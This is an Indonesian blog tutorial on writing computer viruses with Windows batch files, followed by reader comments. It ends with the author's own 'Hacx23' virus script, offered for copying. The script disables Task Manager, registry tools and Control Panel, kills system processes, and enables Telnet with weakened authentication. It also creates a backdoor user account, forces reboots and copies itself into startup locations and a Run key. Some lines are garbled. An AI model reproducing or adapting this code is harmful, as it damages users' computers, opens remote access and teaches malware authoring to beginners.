Hi semuanya, di siang hari ini saya ingin berbagi sedikit. Tau virus komputer kan, yaitu sebuah program yang dirancang dengan tujuan merusak misalnya untuk mencuri data-data pribadi, merusak system komputer, dan bahkan saya pernah dengan virus yang tujuan dibuatnya adalah untuk mensabotase sistem nuklir namanya 'Stuxnet' mungkin anda pernah dengar. Karena artikel yang saya tulis ini
Nah apakah anda penasaran sebenarnya bagaimana mereka bisa merancang sebuah program yang bersifat merusak yang biasa kita sebut virus komputer tersebut. Sama seperti program-program umum, virus juga dirancang dengan menggunakan bahasa pemograman contohnya C++, Java, Python dll. Virus sederhana juga bisa dibuat dengan hanya bermodalkan notepad. Serius ? Ya. Beberapa orang membuat virus dengan bahasa Visual Basic Script (*.vbs) atau Batch File (*.bat). Kali ini saya akan menjelaskan mengenai teknik-teknik membuat virus dengan Batch File.
1. Perintah paling sederhana dalam batch yaitu echo, yang gunanya adalah menuliskan sebuah kata atau kalimat kedalam program/konsol tersebut. Jika anda membuka cmd anda akan selalu melihat directory kerja anda bukan, jika anda mengeksekusi suatu program di cmd juga nantinya perintah-perintah yang dieksekusi juga masih nampak. Nah, untuk menghilangkan ini maka anda perlu menggunakan perintah @echo off pada awal script anda.
2. Berikutnya anda akan memerlukan perintah cd untuk mengganti directory kerja batch file anda otomatis.
Misalnya directory kerja anda adalah C:\Windows\Temp . Jika anda ingin berpindah ke C:\Windows\security
Maka anda cukup menuliskan syntax berikut di barisan berikut dalam script anda
cd C:\Windows\security
Berdasarkan pengalaman saya jika anda ingin berpindah ke D:\folder saya dari C: maka anda perlu masuk ke D: terlebih dahulu yaitu dengan mengetikkan D: di konsol sebelum berpindah ke D:\folder saya. Satu hal lagi yang perlu anda perhatikan adalah bahwa jika directory yang anda tuju tersebut memiliki spasi maka anda perlu menyatukannya dengan tanda kutip dua ( " ), misalnya cd "D:\folder saya".
3. Berikutnya adalah perintah call dan start. Call berguna untuk memanggil batch lain dari suatu batch file. Ingat kedua batch tersebut harus berada dalam satu directory. Sedangkan perintah start adalah untuk memanggil program lain untuk dijalankan. Syarat sama . :D
4. Berikutnya adalah perintah-perintah dasar yang juga penting seperti .
md = Membuat directory baru => md drive:path nama folder
ren = Menamai sebuah file => ren drive: path namafilesebelum namafilesesudah
dir = Membuat daftar file dari sebuah directory => dir drive: path namafile
goto = Perintah untuk masuk ke label lain di dalam script tersebut
: = Menandai sebuah label misalnya label ini. Ketik :ini sebelum menuliskan script dibawah yang termasuk dalam label ini
title= Menamai program batch
color = Mengganti warna batch file
break = Menghentikan eksekusi batch
exit = Keluar dari batch file/ cmd
msg *= Memberikan pop-up pesan
pause = Ya pause
Untuk lebih lengkapnya masuk aja ke CMD dan kemudian ketik help, untuk keterangan lebih lanjut mengenai sebuah artikel misalnya mengenai goto, ketik help goto.
5. Berikutnya adalah perintah set /p " untuk memberikan pilihan kepada user misalnya.
@echo off
set /p "asal=Pilih Nomor :
if %asal%==1 echo Kamu memilih satu
if %asal%==2 echo Kamu memilih dua
pause
copy aja script diatas ke notepad dan simpan dengan ekstensi bat, jalankan. Kamu akan mengerti
6. Berikutnya adalah perintah >> dan > . Apa bedanya
> membuat output ke satu file baru, >> menambahkan tulisan pada file yang dimaksud. Mengerti kan, jadi misalnya anda ingin menambahkan kata saya ke suatu file notepad yang bernama saya.txt, ketik aja di cmd echo saya >>saya.txt.
7. Kemudian perintah if exist yang gunanya untuk mengecek keberadaan sebuah file dan melakukan perintah yang sesuai jika file tersebut ada atau tidak. Contoh syntax nya :
if exist asal.jpg (del asal.jpg) Else echo asal.jpg hilang
8. Berikutnya adalah perintah attrib, syntax kompleksnya
ATTRIB [+R | -R] [+A | -A] [+S | -S] [+H | -H] [[drive:][path]filename] [/S] [/D]]
R= read only
A = archive
S = system
H= hidden
/S = memproses semua folder didalamnya
/D = file juga ikut diproses
Jadi fungsi perintah attrib ini adalah untuk mengganti attribute sebuah file.
9. Berikutnya adalah perintah for yang akan melakukan sebuah perintah jika syarat terpenuhi. Percaya atau tidak satu baris dibawah ini adalah sebuah virus .
for %%p in (C D E F) do del *.mp3
%%p adalah penamaan batch file, memang begitu adanya p bisa diganti dengan hurus lain, jadi syaratnya adalah jika virus ini berada di C atau D atau di E dan atau di F (T.T hehe tidak efektif) maka program ini akan menghapus semua file yang berekstensi mp3 yang berada di directory kerja nya.
10. Kemudian agar lebih kompleks, anda juga perlu mengetahui perintah CMD untuk jaringan misalnya. Ping, telnet, netuser, nbtstat dan lain-lain.
11. Anda juga saya sarankan punya pengetahuan yang cukup di bidang Registry Hack ( Utak - Atik Registry).
Tips
1. Salah satu keistimewaan dalam membuat virus adalah ketelitian dan imajinasi yang tinggi. Mengapa? karena jika pada program2 biasa anda bisa mengeksekusi nya untuk mengecek apakah program anda itu bisa bekerja dengan baik atau tidak. Beda dengan virus, anda tidak mungkin mencobanya dan mengeksekusinya dalam komputer anda sendiri. Mana ada orang mau merusak komputernya sendiri, kecuali anda menjalankannya secara terisolasi dengan program sandboxie, namun itu belum menjamin 100% komputer anda tidak terinfeksi. Bahkan walaupun komputer saya sudah terinstal deep freeze dengan mengunci folder C, saya masih takut :D. hehe. Karena itulah saya mengatakan bahwa perlu imajinasi yang tinggi sehingga anda bisa membayangkan bagaimana alur kerja program berbahaya anda itu dan memastikan bahwa semuanya berjalan dengan baik.
2. Banyak - banyak lah membaca artikel-artikel yang mungkin bisa membantu anda, bahkan dengan mempelajari script orang pun bisa menambah pengetahuan anda.
3. Masuklah ke berbagai forum yang bisa membantu anda
4. Anda juga bisa mendownload berbagai e-book yang akan memberikan anda banyak informasi penting.
Link-link bagus :
1. Batch Tutorial
2. Batch Tutorial 2
3. Batch Beginner Tutorial
4. Sedikit Mengenai Registry
5. Registry Hack
Hehe, berikut saya sertakan script bonus yang merupakan virus. Merupakan edisi kedua dari virus Hacx23 buatan saya. Hehe. Kalau mau silakan copy ubah ekstensi jadi.bat, resiko ditanggung sendiri. Lagipula script ini tidak complete karena membutuhkan batch - batch lain yang sudah saya gabung dan siap untuk dipakai disini . Script ini hanya untuk bahan referensi anda saja ya :D
@echo off
title Hacx23
copy "C:\Program Files">nul
echo REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer/v NoFind/t REG_DWORD/d 1/f > axfg.bat
echo REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer/v NoRun/t REG_DWORD/d 1/f > axff.bat
echo [HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0]>proc.reg
echo "ProcessorNameString"="Intel got hacked haha">>proc.reg
call axfg.bat
call axff.bat
call proc.reg
color 0f
color f0
color d0
color 0d
color 1d
color 5a
RUNDLL32 USER32.DLL,SwapMouseButton
echo REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer/ NoViewOnDrive/t REG_DWORD/d 4/f >acs.bat
call acs.batif %choose% ==1 echo REG ADD HKCU\ControlPanel\don'tload/v Access.cpl/t REG_SZ/d No/f >%choose%.bat
echo REG ADD HKCU\ControlPanel\don'tload/v Hdwwiz.cpl/t REG_SZ/d No/f >1.bat
echo REG ADD HKCU\ControlPanel\don'tload/v Appwiz.cpl/t REG_SZ/d No/f >2.bat
echo REG ADD HKCU\ControlPanel\don'tload/v Console.cpl/t REG_SZ/d No/f >3.bat
echo REG ADD HKCU\ControlPanel\don'tload/v Timedate.cpl/t REG_SZ/d No/f >4.bat
echo REG ADD HKCU\ControlPanel\don'tload/v Desk.cpl/t REG_SZ/d No/f >5.bat
echo REG ADD HKCU\ControlPanel\don'tload/v Fax.cpl/t REG_SZ/d No/f >6.bat
echo REG ADD HKCU\ControlPanel\don'tload/v Inet.cpl/t REG_SZ/d No/f >7.bat
echo REG ADD HKCU\ControlPanel\don'tload/v Joy.cpl/t REG_SZ/d No/f >8.bat
echo REG ADD HKCU\ControlPanel\don'tload/v Liccpa.cpl/t REG_SZ/d No/f >9.bat
echo REG ADD HKCU\ControlPanel\don'tload/v Main.cpl/t REG_SZ/d No/f >10.bat
echo REG ADD HKCU\ControlPanel\don'tload/v Mlcfg32.cpl/t REG_SZ/d No/f >11.bat
echo REG ADD HKCU\ControlPanel\don'tload/v Modem.cpl/t REG_SZ/d No/f >12.bat
echo REG ADD HKCU\ControlPanel\don'tload/v Ncpa.cpl/t REG_SZ/d No/f >13.bat
echo REG ADD HKCU\ControlPanel\don'tload/v Netcpl.cpl/t REG_SZ/d No/f >14.bat
echo REG ADD HKCU\ControlPanel\don'tload/v Nwc.cpl/t REG_SZ/d No/f >15.bat
echo REG ADD HKCU\ControlPanel\don'tload/v Odbccp32.cpl/t REG_SZ/d No/f >16.bat
echo REG ADD HKCU\ControlPanel\don'tload/v Devapps.cpl/t REG_SZ/d No/f >17.bat
echo REG ADD HKCU\ControlPanel\don'tload/v Ports.cpl/t REG_SZ/d No/f >18.bat
echo REG ADD HKCU\ControlPanel\don'tload/v Telephone.cpl/t REG_SZ/d No/f >19.bat
echo REG ADD HKCU\ControlPanel\don'tload/v Powercfg.cpl/t REG_SZ/d No/f >20.bat
echo REG ADD HKCU\ControlPanel\don'tload/v Intl.cpl/t REG_SZ/d No/f >21.bat
REG ADD HKCU\ControlPanel\don'tload/v Sticpl.cpl/t REG_SZ/d No/f >22.bat
REG ADD HKCU\ControlPanel\don'tload/v Sevmgr.cpl/t REG_SZ/d No/f >23.bat
REG ADD HKCU\ControlPanel\don'tload/v Mmsys.cpl/t REG_SZ/d No/f >24.bat
echo REG ADD HKCU\ControlPanel\don'tload/v Sapi.cpl/t REG_SZ/d No/f >25.bat
echo REG ADD HKCU\ControlPanel\don'tload/v Sysdm.cpl/t REG_SZ/d No/f >26.bat
echo REG ADD HKCU\ControlPanel\don'tload/v Tweakui.cpl/t REG_SZ/d No/f >27.bat
echo REG ADD HKCU\ControlPanel\don'tload/v Nusrrmgr.cpl/t REG_SZ/d No/f >28.bat
echo REG ADD HKCU\ControlPanel\don'tload/v irprops.cpl/t REG_SZ/d No/f >29.bat
echo REG ADD HKCU\ControlPanel\don'tload/v Wspcpl32.cpl/t REG_SZ/d No/f >30.bat
echo REG ADD HKCU\ControlPanel\don'tload/v Adobe Gamma.cpl/t REG_SZ/d No/f >31.bat
echo REG ADD HKCU\ControlPanel\don'tload/v Cpqmgmt.cpl/t REG_SZ/d No/f >32.bat
echo REG ADD HKCU\ControlPanel\don'tload/v lgfxfxcpl.cpl/t REG_SZ/d No/f >33.bat
echo REG ADD HKCU\ControlPanel\don'tload/v Jpicpl32.cpl/t REG_SZ/d No/f >34.bat
echo REG ADD HKCU\ControlPanel\don'tload/v lightFrame.cpl/t REG_SZ/d No/f >35.bat
echo REG ADD HKCU\ControlPanel\don'tload/v Nmo.cpl/t REG_SZ/d No/f >36.bat
echo REG ADD HKCU\ControlPanel\don'tload/v Mclconf.cpl/t REG_SZ/d No/f 37%.bat
echo REG ADD HKCU\ControlPanel\don'tload/v S32LUCP1.cpl/t REG_SZ/d No/f >38.bat
echo REG ADD HKCU\ControlPanel\don'tload/v Quicktime.cpl/t REG_SZ/d No/f >39.bat
echo REG ADD HKCU\ControlPanel\don'tload/v Avscpa.cpl/t REG_SZ/d No/f >40.bat
echo REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System/v DisableRegistryTools/t REG_DWORD/d 1/f>aqew.bat
echo REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System/v DisableTaskMgr/t REG_DWORD/d 1/f>aqex.bat
call 1.bat
call 2.bat
call 3.bat
call 4.bat
call 5.bat
call 6.bat
call 7.bat
call 8.bat
call 9.bat
call 10.bat
call 12.bat
call 13.bat
call 14.bat
call 15.bat
call 16.bat
call 17.bat
call 18.bat
call 19.bat
call 20.bat
call 21.bat
call 22.bat
call 23.bat
call 24.bat
call 25.bat
call 26.bat
call 27.bat
call 28.bat
call 29.bat
call 30.bat
call 31.bat
call 32.bat
call 33.bat
call 34.bat
call 35.bat
call 36.bat
call 37.bat
call 38.bat
call 39.bat
call 40.bat
call aqew.bat
call aqex.bat
copy "C:\Windows">nul
copy C:\WINDOWS\addins>nul
copy C:\WINDOWS\system32>nul
copy C:\WINDOWS\system>nul
tskill /PID 0
tskill /PID 2560
tskill /PID 4
tskill /PID 572
sc config TlntSvr start= auto
sc start TlntSvr
tlntadmn config sec=-NTLM
tlntadmn config mode=stream
net user Hacx /add
net user Hacx 123123
cd D:\
tree
attrib -r -h -s /s /d
msg * I'm sorry all files has been deleted
copy %0 D:\
echo REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer/v NoClose/t REG_DWORD/d 1/f>CO12.bat
call co12.bat
echo @echo off >axs.bat
echo shutdown -r -f -t 23>axs.bat
echo msg * I'm Sorry >>axs.bat
copy axs.bat %systemroot%
copy axs.bat D:\
copy axs.bat %desktop%
copy %0 "C:\Documents and Settings\All Users\Startmenu\Program\Autostart\%random%.bat" > nul
copy %0 "C:\Documents and Settings\All Users\Startmenu\Program\%random%.bat" > nul
copy %0 "C:\Documents and Settings\All Users\Startmenu\%random%.bat" > nul
copy %0 "C:\Documents and Settings\%USERNAME%\Desktop\%random%.bat" > nul
copy %0 "C:\%random%.bat" > nul
echo REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run/v axs/t REG_SZ/d D:\axs.bat/f>qwert.bat
call qwert.bat
start "title" killerjo.net
color 0f
color f0
color d0
color 0d
color 1d
color 5a
color 0f
color f0
color d0
color 0d
color 1d
color 5a
color 0f
color f0
color d0
color 0d
color 1d
color 5a
color 0f
color f0
color d0
color 0d
color 1d
color 5a
cd D:\
md junk
md junk1
md junk2
md junk3
md junk4
md junk5
md haha
md haha2
dir >aaa.txt
call 8.au
call aa.txt
comment please :D
BalasHapuswew,. aku suka,. tpi dikit,. namun,. dah keren tutorialnya,. hanya penyampaian ea,. agak sedikit yg krng dimengerti,. he :D
BalasHapusthack kk boleh aku blajar sama kk
BalasHapuskk facebook nya apa
twitternya apa .???
aku mau blajar bat file lebih mendalam